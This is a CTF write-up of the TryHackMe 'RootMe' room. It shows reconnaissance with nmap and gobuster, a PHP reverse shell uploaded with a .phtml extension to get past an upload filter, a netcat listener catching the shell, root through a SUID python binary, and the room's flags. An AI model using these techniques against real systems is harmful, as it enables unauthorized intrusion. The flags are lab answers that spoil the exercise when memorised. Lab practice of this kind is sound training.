TryHackMe - RootMe - Writeup
A ctf for beginners, can you root me?
Nmap Scan
root@ip-10-10-155-254:~# nmap -sCV -A 10.10.25.35
Starting Nmap 7.60 ( https://nmap.org ) at 2021-06-24 02:58 BST
Nmap scan report for ip-10-10-25-35.eu-west-1.compute.internal (10.10.25.35)
Host is up (0.011s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
| 256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_ 256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (EdDSA)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HackIT - Home
MAC Address: 02:27:60:5D:6D:79 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=6/24%OT=22%CT=1%CU=35011%PV=Y%DS=1%DC=D%G=Y%M=022760%T
OS:M=60D3E6EE%P=x86_64-pc-linux-gnu)SEQ(SP=FE%GCD=1%ISR=106%TI=Z%CI=Z%TS=A)
OS:SEQ(SP=FE%GCD=1%ISR=106%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M2301ST11NW7%O2=M2301
OS:ST11NW7%O3=M2301NNT11NW7%O4=M2301ST11NW7%O5=M2301ST11NW7%O6=M2301ST11)WI
OS:N(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=F5
OS:07%O=M2301NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T
OS:3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S
OS:=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%
OS:RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 10.91 ms ip-10-10-25-35.eu-west-1.compute.internal (10.10.25.35)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.13 seconds
Directory fuzzing
root@ip-10-10-155-254:~# gobuster dir -u http://10.10.25.35 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,sh,txt,cgi,html,css,js,py,conf
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.25.35
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: sh,cgi,css,py,conf,php,txt,html,js
[+] Timeout: 10s
===============================================================
2021/06/24 03:04:01 Starting gobuster
===============================================================
/index.php (Status: 200)
/uploads (Status: 301)
/css (Status: 301)
/js (Status: 301)
/panel (Status: 301)
/server-status (Status: 403)
Progress: 184238 / 220561 (83.53%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2021/06/24 03:29:09 Finished
===============================================================
Reconnaissance
Question: Scan the machine, how many ports are open?
Answer: 2
Question: What version of Apache is running?
Answer: 2.4.29
Question: What service is running on port 22?
Answer: SSH
Question: Find directories on the web server using the GoBuster tool.
Answer: No answer needed
Question: What is the hidden directory?
Answer: /panel/
Getting a shell
Find a form to upload and get a reverse shell, and find the flag.
Navigate to http://10.10.25.35/panel/ and download php reverse shell and rename it .php to .phtml extension
root@ip-10-10-155-254:~# wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
--2021-06-24 03:33:27-- https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.109.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5491 (5.4K) [text/plain]
Saving to: \u2018php-reverse-shell.php\u2019
php-reverse-shell.php 100%[=====================================>] 5.36K --.-KB/s in 0s
2021-06-24 03:33:29 (56.0 MB/s) - \u2018php-reverse-shell.php\u2019 saved [5491/5491]
root@ip-10-10-155-254:~# mv php-reverse-shell.php shell.phtml
Change IP and Port from the shell.phtml of your host machine. After upload the shell navigate to http://10.10.25.35/uploads/ you’ll see the shell.phtml which you uploaded. Make sure your netcat listening to the port you provied in the shell.
root@ip-10-10-155-254:~# nc -nlvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from 10.10.25.35 55994 received!
Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
02:53:28 up 56 min, 0 users, load average: 0.00, 0.03, 1.02
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/bash")'
bash-4.4$ llss
bin dev initrd.img lib64 mnt root snap sys var
boot etc initrd.img.old lost+found opt run srv tmp vmlinuz
cdrom home lib media proc sbin swap.img usr vmlinuz.old
bash-4.4$
We got shell. Now we have to find user.txt I tried see in /home/* if there user.txt file available there isn’t any file like that so I used find command to find the flag.
bash-4.4$ find . -name user.txt 2>/dev/null
./var/www/user.txt
bash-4.4$ ccaatt ./var/www/user.txt./var/www/user.txt
THM{y0u_g0t_a_sh3ll}
Privilege escalation
Now that we have a shell, let’s escalate our privileges to root.
bash-4.4$ find . -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
-rwsr-xr-- 1 root messagebus 42992 Jun 11 2020 ./usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 113528 Jul 10 2020 ./usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 100760 Nov 23 2018 ./usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 10232 Mar 28 2017 ./usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 436552 Mar 4 2019 ./usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 14328 Mar 27 2019 ./usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 18448 Jun 28 2019 ./usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 37136 Mar 22 2019 ./usr/bin/newuidmap
-rwsr-xr-x 1 root root 37136 Mar 22 2019 ./usr/bin/newgidmap
-rwsr-xr-x 1 root root 44528 Mar 22 2019 ./usr/bin/chsh
-rwsr-sr-x 1 root root 3665768 Aug 4 2020 ./usr/bin/python
-rwsr-xr-x 1 root root 76496 Mar 22 2019 ./usr/bin/chfn
-rwsr-xr-x 1 root root 75824 Mar 22 2019 ./usr/bin/gpasswd
-rwsr-xr-x 1 root root 149080 Jan 31 2020 ./usr/bin/sudo
-rwsr-xr-x 1 root root 40344 Mar 22 2019 ./usr/bin/newgrp
-rwsr-xr-x 1 root root 59640 Mar 22 2019 ./usr/bin/passwd
-rwsr-xr-x 1 root root 22520 Mar 27 2019 ./usr/bin/pkexec
-rwsr-xr-x 1 root root 40152 Oct 10 2019 ./snap/core/8268/bin/mount
-rwsr-xr-x 1 root root 44168 May 7 2014 ./snap/core/8268/bin/ping
-rwsr-xr-x 1 root root 44680 May 7 2014 ./snap/core/8268/bin/ping6
-rwsr-xr-x 1 root root 40128 Mar 25 2019 ./snap/core/8268/bin/su
-rwsr-xr-x 1 root root 27608 Oct 10 2019 ./snap/core/8268/bin/umount
-rwsr-xr-x 1 root root 71824 Mar 25 2019 ./snap/core/8268/usr/bin/chfn
-rwsr-xr-x 1 root root 40432 Mar 25 2019 ./snap/core/8268/usr/bin/chsh
-rwsr-xr-x 1 root root 75304 Mar 25 2019 ./snap/core/8268/usr/bin/gpasswd
-rwsr-xr-x 1 root root 39904 Mar 25 2019 ./snap/core/8268/usr/bin/newgrp
-rwsr-xr-x 1 root root 54256 Mar 25 2019 ./snap/core/8268/usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Oct 11 2019 ./snap/core/8268/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jun 10 2019 ./snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 Mar 4 2019 ./snap/core/8268/usr/lib/openssh/ssh-keysign
-rwsr-sr-x 1 root root 106696 Dec 6 2019 ./snap/core/8268/usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root dip 394984 Jun 12 2018 ./snap/core/8268/usr/sbin/pppd
-rwsr-xr-x 1 root root 40152 Jan 27 2020 ./snap/core/9665/bin/mount
-rwsr-xr-x 1 root root 44168 May 7 2014 ./snap/core/9665/bin/ping
-rwsr-xr-x 1 root root 44680 May 7 2014 ./snap/core/9665/bin/ping6
-rwsr-xr-x 1 root root 40128 Mar 25 2019 ./snap/core/9665/bin/su
-rwsr-xr-x 1 root root 27608 Jan 27 2020 ./snap/core/9665/bin/umount
-rwsr-xr-x 1 root root 71824 Mar 25 2019 ./snap/core/9665/usr/bin/chfn
-rwsr-xr-x 1 root root 40432 Mar 25 2019 ./snap/core/9665/usr/bin/chsh
-rwsr-xr-x 1 root root 75304 Mar 25 2019 ./snap/core/9665/usr/bin/gpasswd
-rwsr-xr-x 1 root root 39904 Mar 25 2019 ./snap/core/9665/usr/bin/newgrp
-rwsr-xr-x 1 root root 54256 Mar 25 2019 ./snap/core/9665/usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Jan 31 2020 ./snap/core/9665/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jun 11 2020 ./snap/core/9665/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 May 26 2020 ./snap/core/9665/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 110656 Jul 10 2020 ./snap/core/9665/usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root dip 394984 Feb 11 2020 ./snap/core/9665/usr/sbin/pppd
-rwsr-xr-x 1 root root 43088 Jan 8 2020 ./bin/mount
-rwsr-xr-x 1 root root 44664 Mar 22 2019 ./bin/su
-rwsr-xr-x 1 root root 30800 Aug 11 2016 ./bin/fusermount
-rwsr-xr-x 1 root root 64424 Jun 28 2019 ./bin/ping
-rwsr-xr-x 1 root root 26696 Jan 8 2020 ./bin/umount
I saw python it’s kinda weird to see in SUID permission.
Question: Search for files with SUID permission, which file is weird?
Answer: /usr/bin/python
Question: Find a form to escalate your privileges.
Answer: No answer needed
Navigate to GTFOBins and use second command to get root.
bash-4.4$ python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
whoami
root
cd /root
ls
root.txt
cat root.txt
THM{pr1v1l3g3_3sc4l4t10n}
Question: root.txt
Answer: THM{pr1v1l3g3_3sc4l4t10n}
Room link: RootMe
Written on June 24, 2021